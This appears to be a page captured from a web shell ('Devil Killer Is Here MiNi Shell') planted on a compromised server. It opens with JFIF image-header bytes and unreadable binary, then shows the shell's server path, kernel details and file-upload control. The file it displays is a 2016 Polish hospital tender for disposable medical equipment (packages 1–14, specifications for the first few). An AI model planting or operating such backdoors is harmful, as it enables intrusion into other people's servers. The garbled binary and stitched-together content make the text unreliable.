JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20160614/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20160614/83949-N-2016.html

<p class="kh_header"><b>Tarnowskie Góry: DOSTAWY SPRZĘTU MEDYCZNEGO 
JEDNORAZOWEGO UŻYCIA</b><br>
<b>Numer ogłoszenia: 83949 - 2016; data zamieszczenia: 14.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wielospecjalistyczny Szpital Powiatowy Spółka Akcyjna , ul. Pyskowicka 47-51, 42-612 Tarnowskie Góry, woj. śląskie, tel. 32 285 40 58, faks 32 384 54 04.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wspsa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Niepubliczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWY SPRZĘTU MEDYCZNEGO 
JEDNORAZOWEGO UŻYCIA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są sukcesywne dostawy sprzętu medycznego jednorazowego użytku. Zamówienie składa się z 14 części tzw. Pakietów, z których każdy stanowi oddzielny przedmiot zamówienia: 
Pakiet 1    Zestaw do hemofiltracji, wkłucia dializacyjne do aparatu AQUARIUS Platinum wersja 6
Pakiet 2  Jałowy zestaw do wkłuć centralnych
Pakiet 3  Materiały zużywalne do aparatu Infant Flow SiPAP system LP
Pakiet 4  Układ oddechowy do respiratorów dla noworodków
Pakiet 5  Cewniki 
Pakiet 6  Akcesoria do badań urodynamicznych
Pakiet 7  Zestawy drenów do pompy płuczącej PV-5201
Pakiet 8  Prowadnice jednorazowe do głowicy UST-9124 do USG Aloka
Pakiet 9  Aplikator do preparatu Lidocain EGIS
Pakiet 10 Stabilizator do wkuć centralnych typu STATLOCK
Pakiet 11 Osłona na zęby
Pakiet 12  Igły do ostrzyknięć
Pakiet 13 Ustnik do alkomatu z serii Alkohit X100
Pakiet 14 - Cewnik tlenowy do aparatu PORTI 8.

 2. Szczegółowy opis przedmiotu zamówienia - asortyment oraz ilość znajdują się w załącznikach
nr [D.1] ÷ [D.14] do niniejszej SIWZ.
 3. Składane oferty muszą  zawierać pełny zakres przedmiotu zamówienia w danym pakiecie.
4. Zamawiający zastrzega sobie prawo realizowania zamówień w ilościach uzależnionych od rzeczywistych  
    potrzeb i posiadanych środków oraz do ograniczenia zamówienia w zakresie rzeczowym i ilościowym,
    co nie jest odstąpieniem od umowy nawet w części.
7. Zamawiający zastrzega sobie prawo do zmiany limitów ilościowych zamawianego asortymentu w stosunku 
   do określonych w poszczególnych pozycjach pakietu, stanowiącego załącznik do umowy zarówno in plus 
   jak i in minus, bez zmiany wartości brutto przedmiotu umowy określonej w § 2 ust. 1 projektu umowy,
   a Wykonawca wyraża na to zgodę..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 14.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia, zgodnie z załącznikiem [E.1] do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia, zgodnie z załącznikiem [E.1] do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia, zgodnie z załącznikiem [E.1] do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia, zgodnie z załącznikiem [E.1] do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia, zgodnie z załącznikiem [E.1] do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony szczegółowo formularz oferty - część [C] stanowiący załącznik do SIWZ
2. Wypełniony formularz cenowy - część [D] stanowiący załącznik do SIWZ
3. Wzór oświadczeń - część [E.1], [E.2]stanowiący załącznik do SIWZ
4. Wzór oświadczeń - część [F] stanowiący załącznik do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin realizacji dostawy CITO - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany i uzupełnienia niniejszej umowy mogą być dokonywane wyłącznie w formie pisemnego aneksu, podpisanego przez obie strony pod rygorem nieważności i będą dopuszczalne w granicach unormowania artykułu 144 ustawy Prawo zamówień publicznych. 
2.  Strony dopuszczają zmiany umowy w zakresie:
    a)  zmiany stawki podatku od towarów i usług, gdzie zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian.
    b)  zmiany ceny korzystne dla Zamawiającego wynikające z obniżenia ceny.          
3. Dopuszcza się zmianę umowy w zakresie przedmiotowym tj. zastąpienie produktu objętego umową  odpowiednikiem w przypadku:
    a)  zaprzestania wytwarzania produktu objętego umową,
    b)  wygaśnięcia świadectwa rejestracji,
    c)  czasowego braku dostępności produktu objętego umową.
    Każda zmiana asortymentu wymaga wcześniejszego pisemnego lub telefonicznego (z 
   potwierdzeniem faksem) uzgodnienia. Osobą upoważnioną do uzgodnień lub do akceptacji 
   równoważnego produktu ze strony Zamawiającego jest Kierownik Apteki Szpitalnej. 
   Zmiany w tym zakresie nie wymagają aneksów do umowy.
4.  Zmiany umowy z pominięciem ust. 3 niniejszego paragrafu wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wspsa.pl/zakładka przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w Wielospecjalistycznym Szpitalu Powiatowym S.A.
w Tarnowskich Górach, ul. Pyskowicka 47-51 w Dziale zamówień publicznych - budynek administracji.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.06.2016 godzina 09:30, miejsce: w Wielospecjalistycznym Szpitalu Powiatowym S.A.
w Tarnowskich Górach, ul. Pyskowicka 47-51 w Sekretariacie - budynek administracji.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1    Zestaw do hemofiltracji, wkłucia dializacyjne do aparatu AQUARIUS Platinum wersja 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Asortyment	Ilość	j.m.
Zestaw HF12, HF19 + linie do aparatu Aquarius	30	zest.
Aquaspike	15	szt
Worek drenażowy.	60	szt
Infusion spikes	100	szt
Cewnik 11FR dł. 15,20 i 24cm.	13	szt.
Cewnik 13,5-14FR dł. 15,20 i 24cm.	10	szt.
Plasmafiltr 05 lub 07 SQM	5	szt

Wymagania Zamawiającego							
1. Do oferty należy dołączyć : katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia. 							
2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostawy CITO - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 2  Jałowy zestaw do wkłuć centralnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Asortyment	Ilość	j.m.
Jałowy zestaw serwet i komponentów o składzie:    1 x serweta na stolik narzędziowy nieprzylepna 120 x 95cm (owinięcie zestawu);                               1 x serweta chirurgiczna 150 x 100cm z samoprzylepnym otworem o śr. 10cm umieszczonym decentralnie, serweta powinna posiadać naklejony piktogram ułatwiająca jej prawidłowe użycie;                                  1 x kleszczyki plastikowe niebieskie typu korcang do mycia pola 19cm;                   1 x imadło chirurgiczne jednorazowe stalowe typu Mayo-Hegar 12cm;                 1 x opatrunek mocujący przeźroczysty, samoprzylepny 10 x 14cm;      1 x miseczka plastikowa z podziałką 120ml, transparentna;                        5 x kompres z włókniny 7,5 x 7,5cm, 30g/ mkw;                1 x obcinacz do szwów zakrzywiony, jednorazowy, ok. 9,3cm, w całości wykonany z metalu, bezpiecznie pakowany w osobny blister;                        3 x tupfer z gazy 24 x 24cm, 20nitek;                                 1 x fartuch chirurgiczny rozmiar L, typu open back;      1 x strzykawka typu Luer, 2- częściowa, 10ml.	15	zest.

Wymagania Zamawiającego
1. Do oferty należy dołączyć : katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia. 
2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.
Wymagania do pozycji 1:
1. Serwety wykonane z dwuwarstwowej pełnobarierowej włókniny ( zgodnie z EN 13795 1,2,3) o gramaturze min. 54 g/mkw.
2. Fartuch pełnobarierowy wykonany z materiału typu SMMS o gramaturze 40 g/mkw. Rękawy zakończone elastycznym mankietem z dzianiny. Fartuch wiązany na troki. Szwy wykonane techniką ultradźwiękową. Długość fartucha 125cm.
3. Zestaw umieszczony w opakowaniu folia-papie, bezpiecznie pakowany do transportu. Każdy zestaw powinien posiadać 2 naklejki do dokumentacji zawierające datę ważności oraz nr serii ( część tradycyjna i kod kreskowy). Małe elementy w zestawie powinny być dodatkowo zabezpieczone np. poprzez umieszczenie ich w papierowych torebkach.
4. Imadło wykonane ze stali, matowo wykończone, powinno posiadać zgodnie z normą EN 980 symbol jednorazowości umieszczony w sposób trwały po obu stronach narzędzia. Wyrób zgodny z dyrektywą UE 93/42/EWG. Wyrób medyczny klasa Iia reguła 6.
5. Sterylizacja zestawu tlenkiem etylenu. Wymagany dokument walidacji procesu sterylizacji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostawy CITO - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet 3  Materiały zużywalne do aparatu Infant Flow SiPAP system LP.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa	Ilość	J.M.
1.	Układ oddechowy do aparatu Infant Flow SiPAP z generatorem mocowanym na zaczepie kołyskowym, przeznaczony dla noworodków z rurami o średnicy wew. 10 mm. Układ ma posiadać w ramieniu wdechowym dodatkowy niepodgrzewany odcinek o długości ok. 40 cm umożliwiający podłączenie noworodka leczonego w inkubatorze. Generator wyposażony cztery dysze. Układ kompatybilny z aparatem Infant Flow SiPAP - do potwierdzenia oświadczenie producenta aparatu Infant Flow.	15	zest.
2.	Czapeczka wykonana z bawełny, wyposażona w rzep w kształcie litery T do mocowania uchwytu z generatorem na głowie noworodka. Wielkość czapeczki oznaczona jest kolorem w sposób trwały. Różne rozmiary, zamawiane wg potrzeb Zamawiającego	3	szt.
3.	Pasek mocujący generator do czapeczki 	3	szt.
4.	Mocowanie paskowe wykonane w kształcie litery T z bardzo elastycznego materiału, od którego podstawy odchodzą 3 ramiona oznaczone numerami 1, 2 i 3 służące do prawidłowego zapięcia. Jego   końcówki są zapinane na rzepy. Część potyliczna wykonana jest ze specjalnego materiału przeciwodleżynowego. Rozmiary XS, S, SM, M, L, XL. Zamawiane wg potrzeb Zamawiającego	20	szt.
5.	Maska nosowa. Podstawa maski przejrzysta. Dostępne rozmiary: XS, S, M, L, XL. Zamawiane wg potrzeb Zamawiającego	3	szt.
6.	Końcówka nosowa. Kształt końcówki minimalizuje jej kontakt ze skórą i zapewnia szczelność. Dostępne rozmiary: XS, S, M, L, XL. Zamawiane wg potrzeb Zamawiającego	3	szt.
7.	Filtr bakteryjny i wyciszający szum od przepływu gazów	3	szt.
8.	Czujnik brzuszny oddechów	3	szt.
9.	Smoczek dopasowany wymiarami do generatora	3	szt.
10.	Komora nawilżacza z automatycznym napełnianiem wodą, z systemem zapobiegającym nadmiernemu parowaniu	15	szt.

Wymagania Zamawiającego						
1. Do oferty należy dołączyć : katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia. 						
2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.						
3. Oferowany asortyment ma być kompatybilny z aparatem Infant Flow SiPAP - do potwierdzenia oświadczenie producenta aparatu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostawy CITO - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet 4  Układ oddechowy do respiratorów dla noworodków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	 Asortyment	Ilość 	j.m.
1	Układ oddechowy dla noworodków z podgrzewanym ramieniem wdechowym zawierającym niepodgrzewane przedłużenie do inkubatora , zawiera: linię pomiaru ciśnienia, pułapkę wodną na ramieniu wydechowym, wąż o dł. 0,6m łączący komorę ze źródłem gazów oddechowych. Układ oddechowy dla noworodków z komorą nawilżacza z automatyczną regulacją poziomu wody i systemem zapobiegającym nadmiernemu parowaniu.	2	zest.

Wymagania Zamawiającego									
1. Do oferty należy dołączyć : katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ.   									
									
2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.00.00-3.</p></li>
